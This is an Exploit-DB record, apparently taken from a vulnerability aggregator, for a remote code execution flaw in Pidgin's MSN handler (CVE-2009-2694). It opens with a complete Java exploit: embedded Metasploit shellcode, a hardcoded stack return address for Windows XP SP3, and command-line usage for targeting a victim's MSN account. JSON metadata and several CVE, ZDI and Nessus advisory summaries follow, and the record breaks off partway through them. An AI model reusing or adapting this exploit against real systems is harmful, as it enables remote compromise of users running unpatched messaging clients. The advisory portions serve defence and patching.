ID EDB-ID:9615 Type exploitdb Reporter Pierre Nogues Modified 2009-09-09T00:00:00
Description
Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform
/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
* which could lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
* java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
public class PidginExploit {
private MsnMessenger messenger;
private String login;
private String password;
private String target;
private int session_id = NumberUtils.getIntRandom();
private byte shellcode[] = new byte[] {
/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};
// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8
private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;
public static void main(String[] args) throws Exception {
if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}
}
public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;
neweip = reteip - shellcode.length ;
for(int i=0;i<shellcode.length;i++)
payload[i] = shellcode[i];
payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}
public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);
initMessenger(messenger);
messenger.login();
}
protected void initMessenger(MsnMessenger messenger) {
messenger.addContactListListener(new MsnContactListAdapter() {
public void contactListInitCompleted(MsnMessenger messenger) {
final Object id = new Object();
messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
public void switchboardStarted(MsnSwitchboard switchboard) {
if (id != switchboard.getAttachment())
return;
switchboard.inviteContact(Email.parseStr(target));
}
public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;
MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);
// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);
msg.setP2PDest(target);
switchboard.sendMessage(msg);
System.out.println("First packet sent, waiting for the ACK");
}
public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}
public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});
messenger.addMessageListener(new MsnMessageAdapter(){
public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);
switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");
}
});
messenger.addMessengerListener(new MsnMessengerAdapter() {
public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}
public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}
public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});
}
}
// milw0rm.com [2009-09-09]
{"published": "2009-09-09T00:00:00", "id": "EDB-ID:9615", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "a3cd763b4f635d42ae04b9db43518ab098599e5d95e579edce9de746183f3049", "description": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/9615/", "lastseen": "2016-02-01T10:59:54", "edition": 1, "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "osvdbidlist": ["54647"], "modified": "2009-09-09T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "sourceHref": "https://www.exploit-db.com/download/9615/", "references": [], "reporter": "Pierre Nogues", "sourceData": "/*\n* Pidgin MSN <= 2.5.8 Remote Code Execution\n*\n* Pierre Nogues - pierz@hotmail.it\n* http://www.indahax.com/\n*\n*\n* Description:\n* Pidgin is a multi-protocol Instant Messenger.\n*\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets\n* which could lead to memory corruption.\n*\n* Affected versions :\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\n*\n* Plateforms :\n* Windows, Linux, Mac\n*\n* Fix :\n* Fixed in Pidgin 2.5.9\n* Update to the latest version : http://www.pidgin.im/download/\n*\n* References :\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\n* [3] http://www.pidgin.im/news/security/?id=34\n*\n* Usage :\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java\n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\n*\n*/\n\nimport net.sf.jml.*;\nimport net.sf.jml.event.*;\nimport net.sf.jml.impl.*;\nimport net.sf.jml.message.p2p.*;\nimport net.sf.jml.util.*;\n\npublic class PidginExploit {\n\n private MsnMessenger messenger;\n private String login;\n private String password;\n private String target;\n\n private int session_id = NumberUtils.getIntRandom();\n\n private byte shellcode[] = new byte[] {\n\n /*\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\n * sub esp,500\n */\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\n\n\n /*\n * windows/exec - 121 bytes\n * http://www.metasploit.com\n * EXITFUNC=process, CMD=calc.exe\n */\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\n (byte) 0x00\n };\n\n // reteip = pointer to the return address in the stack\n // The shellcode will be wrote just before reteip\n // and reteip will automaticly point to the shellcode. It's magic !\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\n\n private int neweip;\n private byte[] payload = new byte[shellcode.length + 4];\n private int totallength = reteip + 4;\n\n public static void main(String[] args) throws Exception {\n\n if(args.length != 3){\n System.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\");\n }else{\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\n exploit.start();\n }\n\n }\n\n public PidginExploit(String login, String password, String target){\n this.login = login;\n this.password = password;\n this.target = target;\n\n neweip = reteip - shellcode.length ;\n\n for(int i=0;i<shellcode.length;i++)\n payload[i] = shellcode[i];\n\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\n }\n\n public void start() {\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\n\n messenger.setLogIncoming(false);\n messenger.setLogOutgoing(false);\n\n initMessenger(messenger);\n messenger.login();\n }\n\n protected void initMessenger(MsnMessenger messenger) {\n\n messenger.addContactListListener(new MsnContactListAdapter() {\n\n public void contactListInitCompleted(MsnMessenger messenger) {\n\n final Object id = new Object();\n\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\n\n public void switchboardStarted(MsnSwitchboard switchboard) {\n\n if (id != switchboard.getAttachment())\n return;\n\n switchboard.inviteContact(Email.parseStr(target));\n }\n\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\n if (id != switchboard.getAttachment())\n return;\n\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\n msg.setIdentifier(NumberUtils.getIntRandom());\n msg.setSessionId(session_id);\n msg.setOffset(0);\n msg.setTotalLength(totallength);\n msg.setCurrentLength(totallength);\n\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\n // We'll use this buffer to rewrite memory in the stack\n msg.setFlag(0x1000020);\n\n msg.setP2PDest(target);\n\n switchboard.sendMessage(msg);\n\n System.out.println(\"First packet sent, waiting for the ACK\");\n\n }\n\n public void switchboardClosed(MsnSwitchboard switchboard) {\n System.out.println(\"switchboardClosed\");\n switchboard.getMessenger().removeSwitchboardListener(this);\n }\n\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\n System.out.println(\"contactLeaveSwitchboard\");\n }\n });\n messenger.newSwitchboard(id);\n }\n });\n\n messenger.addMessageListener(new MsnMessageAdapter(){\n\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\n\n //We receive the ACK of our first packet with the ID of the new bogus packet\n message.getIdentifier();\n\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\n payload.length, payload, target);\n\n switchboard.sendMessage(msg);\n System.out.println(\"ACK received && Payload sent !\");\n System.out.println(\"Exploit OK ! CTRL+C to quit\");\n\n }\n });\n\n\n\n messenger.addMessengerListener(new MsnMessengerAdapter() {\n\n public void loginCompleted(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" login\");\n }\n\n public void logout(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" logout\");\n }\n\n public void exceptionCaught(MsnMessenger messenger,\n Throwable throwable) {\n System.out.println(\"caught exception: \" + throwable);\n }\n });\n\n }\n}\n\n// milw0rm.com [2009-09-09]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2009-1376", "type": "cve", "title": "CVE-2009-1376", "description": "Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.", "published": "2009-05-26T11:30:05", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1376", "cvelist": ["CVE-2009-1376"], "lastseen": "2017-09-29T14:26:35"}, {"id": "CVE-2009-2694", "type": "cve", "title": "CVE-2009-2694", "description": "The msn_slplink_process_msg function in libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by sending multiple crafted SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary memory location. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1376.", "published": "2009-08-21T07:02:41", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-09-19T13:36:35"}], "zdi": [{"id": "ZDI-09-031", "type": "zdi", "title": "Multiple Vendor libpurple MSN Protocol SLP Message Heap Overflow Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of messaging applications that make use of the libpurple library. User interaction is not required to exploit this vulnerability.\n\nThe specific flaw exists in the implementation of the MSN protocol, specifically the handling of SLP messages. The function msn_slplink_process_msg() fails to properly validate an offset value specified in the SLP packet. By providing a specific value, an attacker can overflow a heap buffer resulting in arbitrary code execution.", "published": "2009-06-08T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-031", "cvelist": ["CVE-2009-1376"], "lastseen": "2016-11-09T00:18:07"}], "nessus": [{"id": "UBUNTU_USN-781-2.NASL", "type": "nessus", "title": "Ubuntu 6.06 LTS : gaim vulnerabilities (USN-781-2)", "description": "It was discovered that Gaim did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Gaim to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2009-06-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39313", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:43:06"}, {"id": "DEBIAN_DSA-1805.NASL", "type": "nessus", "title": "Debian DSA-1805-1 : pidgin - several vulnerabilities", "description": "Several vulnerabilities have been discovered in Pidgin, a graphical multi-protocol instant messaging client. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2009-1373 A buffer overflow in the Jabber file transfer code may lead to denial of service or the execution of arbitrary code.\n\n - CVE-2009-1375 Memory corruption in an internal library may lead to denial of service.\n\n - CVE-2009-1376 The patch provided for the security issue tracked as CVE-2008-2927 - integer overflows in the MSN protocol handler - was found to be incomplete.\n\nThe old stable distribution (etch) is affected under the source package name gaim. However, due to build problems the updated packages couldn't be released along with the stable version. It will be released once the build problem is resolved.", "published": "2009-05-24T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38878", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1373"], "lastseen": "2017-10-29T13:43:51"}, {"id": "ORACLELINUX_ELSA-2009-1059.NASL", "type": "nessus", "title": "Oracle Linux 3 : pidgin (ELSA-2009-1059)", "description": "From Red Hat Security Advisory 2009:1059 :\n\nAn updated pidgin package that fixes two security issues is now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. (CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to this update package, which contains backported patches to resolve these issues. Pidgin must be restarted for this update to take effect.", "published": "2013-07-12T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=67862", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:33:51"}, {"id": "SUSE_GAIM-6350.NASL", "type": "nessus", "title": "SuSE 10 Security Update : gaim (ZYPP Patch Number 6350)", "description": "- malformed responses to file transfers could cause a buffer overflow in pidgin. (CVE-2009-1373)\n\n - the fix against integer overflows in the msn protocol handling was incomplete. (CVE-2009-1376)\n\n - certain ICQ message types could crash pidgin.\n (CVE-2009-1889)", "published": "2011-01-27T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=51744", "cvelist": ["CVE-2009-1376", "CVE-2009-1889", "CVE-2009-1373"], "lastseen": "2017-10-29T13:40:59"}, {"id": "REDHAT-RHSA-2009-1059.NASL", "type": "nessus", "title": "RHEL 3 : pidgin (RHSA-2009:1059)", "description": "An updated pidgin package that fixes two security issues is now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. (CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to this update package, which contains backported patches to resolve these issues. Pidgin must be restarted for this update to take effect.", "published": "2009-05-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38871", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:32:51"}, {"id": "CENTOS_RHSA-2009-1059.NASL", "type": "nessus", "title": "CentOS 3 : pidgin (CESA-2009:1059)", "description": "An updated pidgin package that fixes two security issues is now available for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers when using the Extensible Messaging and Presence Protocol (XMPP). If a Pidgin client initiates a file transfer, and the remote target sends a malformed response, it could cause Pidgin to crash or, potentially, execute arbitrary code with the permissions of the user running Pidgin. This flaw only affects accounts using XMPP, such as Jabber and Google Talk. (CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory RHSA-2008:0584 provided an incomplete fix for the integer overflow flaw affecting Pidgin's MSN protocol handler. If a Pidgin client receives a specially crafted MSN message, it may be possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list can send you messages. This prevents arbitrary MSN users from exploiting this flaw.\n\nAll Pidgin users should upgrade to this update package, which contains backported patches to resolve these issues. Pidgin must be restarted for this update to take effect.", "published": "2009-05-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38868", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-29T13:33:43"}, {"id": "PIDGIN_2_5_6.NASL", "type": "nessus", "title": "Pidgin < 2.5.6 Multiple Buffer Overflows", "description": "The remote host is running Pidgin earlier than 2.5.6. Such versions are reportedly affected by multiple buffer overflow vulnerabilities :\n\n - A buffer overflow is possible when initiating a file transfer to a malicious buddy over XMPP. (CVE-2009-1373)\n\n - A buffer overflow issue in the 'decrypt_out()' function can be exploited through specially crafted 'QQ' packets.\n (CVE-2009-1374)\n\n - A buffer maintained by PurpleCircBuffer which is used by XMPP and Sametime protocol plugins can be corrupted if it's exactly full and then more bytes are added to it.\n (CVE-2009-1375)\n\n - An integer-overflow issue exists in the application due to an incorrect typecasting of 'int64' to 'size_t'.\n (CVE-2009-1376)", "published": "2009-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38866", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2017-10-29T13:41:20"}, {"id": "CENTOS_RHSA-2009-1218.NASL", "type": "nessus", "title": "CentOS 3 / 5 : pidgin (CESA-2009:1218)", "description": "Updated pidgin packages that fix a security issue are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's MSN protocol handler. If a user received a malicious MSN message, it was possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve this issue. Pidgin must be restarted for this update to take effect.", "published": "2009-08-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40625", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "lastseen": "2017-10-29T13:34:35"}, {"id": "SUSE_11_1_FINCH-090708.NASL", "type": "nessus", "title": "openSUSE Security Update : finch (finch-1088)", "description": "Several bugfixes were done for the Instant Messenger Pidgin :\n\n - Malformed responses to file transfers could cause a buffer overflow in pidgin (CVE-2009-1373) and specially crafted packets could crash it (CVE-2009-1375).\n\n - The fix against integer overflows in the msn protocol handling was incomplete (CVE-2009-1376).\n\n - Fixed misparsing ICQ message as SMS DoS (CVE-2009-1889, Pidgin#9483).\n\nAlso the Yahoo IM protocol was made to work again.", "published": "2009-07-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40338", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1889", "CVE-2009-1373"], 